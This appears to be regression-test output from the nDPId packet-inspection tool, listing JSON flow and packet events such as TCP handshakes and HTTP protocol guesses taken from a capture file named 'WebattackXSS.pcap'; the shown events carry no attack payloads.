-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347598383,"flow_last_seen":1499347598383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347598383,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1499347598383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347598383,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jLdAAD4GORmsEAABwKgKMuYaAFCJpsNgAAAAAKACchDafwAAAgQFtAQCCAoBO0\/XAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":2,"flow_last_seen":1499347598383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347598383,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5hrRW5D8iabDYaAScSBT1AAAAgQFtAQCCAoD5SFNATtP1wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":3,"flow_last_seen":1499347598385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347598385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jLhAAD4GOSCsEAABwKgKMuYaAFCJpsNh0VuQ\/YAQAOXy2gAAAQEICgE7T9gD5SFN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347599663,"flow_last_seen":1499347599663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347599663,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1499347599663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347599663,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qjVAAD4GG5usEAABwKgKMuYoAFAgjfstAAAAAKACchAKfQAAAgQFtAQCCAoBO1EYAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":2,"flow_last_seen":1499347599663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347599663,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5igR\/+x3II37LqAScSDmcgAAAgQFtAQCCAoD5SKNATtRGAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":3,"flow_last_seen":1499347599664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347599664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qjZAAD4GG6KsEAABwKgKMuYoAFAgjfsuEf\/seIAQAOWFegAAAQEICgE7URgD5SKN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347602223,"flow_last_seen":1499347602223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347602223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1499347602223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347602223,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZzNAAD4GXp2sEAABwKgKMuZCAFA0xTSkAAAAAKACchC6NQAAAgQFtAQCCAoBO1OXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":2,"flow_last_seen":1499347602223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347602223,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5kLiWaZmNMU0paAScSAJYgAAAgQFtAQCCAoD5SUNATtTlwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":3,"flow_last_seen":1499347602224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347602224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZzRAAD4GXqSsEAABwKgKMuZCAFA0xTSl4lmmZ4AQAOWoaAAAAQEICgE7U5gD5SUN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347603507,"flow_last_seen":1499347603507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347603507,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1499347603507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347603507,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rD1AAD4GGZOsEAABwKgKMuZQAFBpufjkAAAAAKACchC\/sAAAAgQFtAQCCAoBO1TZAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":2,"flow_last_seen":1499347603507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347603507,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5lDEx3+iabn45aAScSBR8gAAAgQFtAQCCAoD5SZOATtU2QEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":3,"flow_last_seen":1499347603508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347603508,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rD5AAD4GGZqsEAABwKgKMuZQAFBpufjlxMd\/o4AQAOXw+QAAAQEICgE7VNkD5SZO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347604752,"flow_last_seen":1499347604752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347604752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1499347604752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347604752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ltJAAD4GLv6sEAABwKgKMuZeAFCga8DCAAAAAKACchC\/2wAAAgQFtAQCCAoBO1YQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":2,"flow_last_seen":1499347604752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347604752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5l5oMbaJoGvAw6AScSB2lQAAAgQFtAQCCAoD5SeFATtWEAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":3,"flow_last_seen":1499347604753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347604753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ltNAAD4GLwWsEAABwKgKMuZeAFCga8DDaDG2ioAQAOUVnQAAAQEICgE7VhAD5SeF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347606078,"flow_last_seen":1499347606078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347606078,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1499347606078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347606078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83l9AAD4G53CsEAABwKgKMuZsAFA9+okEAAAAAKACchBYsgAAAgQFtAQCCAoBO1dbAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5332,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":2,"flow_last_seen":1499347606078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347606078,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5mwyfi78PfqJBaAScSDLYAAAAgQFtAQCCAoD5SjRATtXWwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5334,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":3,"flow_last_seen":1499347606080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347606080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03mBAAD4G53esEAABwKgKMuZsAFA9+okFMn4u\/YAQAOVqZwAAAQEICgE7V1wD5SjR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347607344,"flow_last_seen":1499347607344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1499347607344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8neJAAD4GJ+6sEAABwKgKMuZ6AFBKtMV6AAAAAKACchAONwAAAgQFtAQCCAoBO1iYAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":2,"flow_last_seen":1499347607344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5nrlgxvESrTFe6AScSDf2wAAAgQFtAQCCAoD5SoNATtYmAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":3,"flow_last_seen":1499347607345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347607345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0neNAAD4GJ\/WsEAABwKgKMuZ6AFBKtMV75YMbxYAQAOV+4wAAAQEICgE7WJgD5SoN"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347608596,"flow_last_seen":1499347608596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347608596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 